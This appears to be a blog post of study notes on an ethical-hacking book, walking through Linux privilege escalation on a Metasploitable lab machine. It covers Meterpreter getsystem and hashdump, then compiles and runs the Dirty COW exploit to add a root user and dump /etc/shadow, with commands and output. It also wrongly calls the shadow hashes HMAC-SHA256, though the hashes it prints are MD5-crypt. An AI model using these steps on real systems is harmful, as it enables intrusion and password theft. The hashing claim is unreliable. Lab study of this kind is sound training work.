Ethical.Hacking.2021.10：PIVOTING AND PRIVILEGE ESCALATION（2）Extracting Password Hashes on Linux

最新推荐文章于 2024-11-08 14:34:47 发布

花纵酒

最新推荐文章于 2024-11-08 14:34:47 发布

阅读量665

点赞数

分类专栏：读原著笔记文章标签： linux linq 运维

本文链接：https://blog.csdn.net/lm19770429/article/details/121884998

版权

读原著笔记专栏收录该内容

35 篇文章 2 订阅

订阅专栏

Linux doesn’t store plaintext passwords. Instead, it stores an HMAC-SHA256 hash of the
passwords in the file /etc/shadow.

The permissions on the /etc/shadow/ file indicate that only the owner (root) and the group (shadow) can read the file, and that only a root user can write to it.

The unix-privesc tool is preinstalled on Kali Linux and allows you to check a system for vulnerabilities that might allow a privilege escalation attack:

unix-privesc-check standard

The Meterpreter shell has similar functionality built in. You can
use the command getsystem to search for and exploit possible
privilege escalation vulnerabilities:

meterpreter > getsystem

After you gain root privileges, run the Meterpreter module
hashdump to extract the hashes from the system.

meterpreter > run hashdump

举例: Performing a Dirty COW Privilege Escalation Attack

a kernel-level vulnerability nicknamed Dirty COW. The vulnerability (CVE-2016-5195) allows an
attacker without root privileges to edit any file by exploiting a bug in how the Linux kernel manages memory.

uname -a to get the current version of Linux:

msfadmin@metasploitable:~$ whoami
msfadmin
msfadmin@metasploitable:~$ uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008
i686 GNU/Linux

When you have the server’s Linux version, use searchsploit to
search for known vulnerabilities affecting that version:

kali@kali:~$ searchsploit Linux Kernel 2.6.24
------------------------------------------------ -----------------------
Exploit Title | Path
------------------------------------------------ -----------------------
Linux Kernel (Solaris 10 / < 5.10 138888-01) - | solaris/local/15962.c
Linux Kernel 2.4.1 < 2.4.37 / 2.6.1 < 2.6.32-rc | linux/local/9844.py
...
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW /proc/se | linux/local/40847.cpp
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW PTRACE_P | linux/local/40838.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE | linux/local/40839.c

Some exploits are more reliable than others. The Dirty COW
PTRACE exploit works reliably on the Linux version running on the
Metasploitable server.
The code for the exploit is available on your Kali Linux virtual
machine. Using searchsploit, supply the exploit number 40839.c, and
use the -p option to find the path to the exploit code:

kali@kali:~$ searchsploit -p 40839
Exploit: Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race
Condition Privilege Escalation (/etc/passwd Method)
URL: https://www.exploit-db.com/exploits/40839
Path: /usr/share/exploitdb/exploits/linux/local/40839.c
File Type: C source, ASCII text, with CRLF line terminators

copy the code onto the Metasploitable machine:

kali@kali:~/$ scp /usr/share/exploitdb/exploits/linux/local/40839.c
msfadmin@192.168.1.101:~/

Compile and execute the exploit:

msfadmin@metasploitable:~$ gcc -pthread 40839.c -o kernelexploit -lcrypt

Now run the exploit (kernelexploit). You’ll be prompted to create a new root user (firefart) and provide it with a password. I’ve chosen 147 here:

msfadmin@metasploitable:~$ ./kernelexploit
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: 147
Complete line:
firefart:fibyOYsv7UnQ6:0:0:pwned:/root:/bin/bash
mmap: b7fa7000
madvise 0
ptrace 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password '147'.

Switch to the newly created user with root privileges:

msfadmin@metasploitable:~$ su firefart
Password:

Now you should be able to read the /etc/shadow file containing
the password hashes:

firefart@metasploitable:/home/msfadmin# cat /etc/shadow
root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:14747:0:99999:7:::
daemon:*:14684:0:99999:7:::
bin:*:14684:0:99999:7:::
sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:14742:0:99999:7:::
...

The entry should contain the HMAC-SHA256 hash of the users’
passwords. You can crack these hashes using the tools introduced
in Chapter 12. If you succeed, you’ll have escalated your privileges
and extracted the plaintext passwords for the system’s users.

Tools like spray allow you to test multiple
passwords and connections simultaneously. However, these tools do
unusual things and could generate security alerts, so you’ll want to
be careful when using them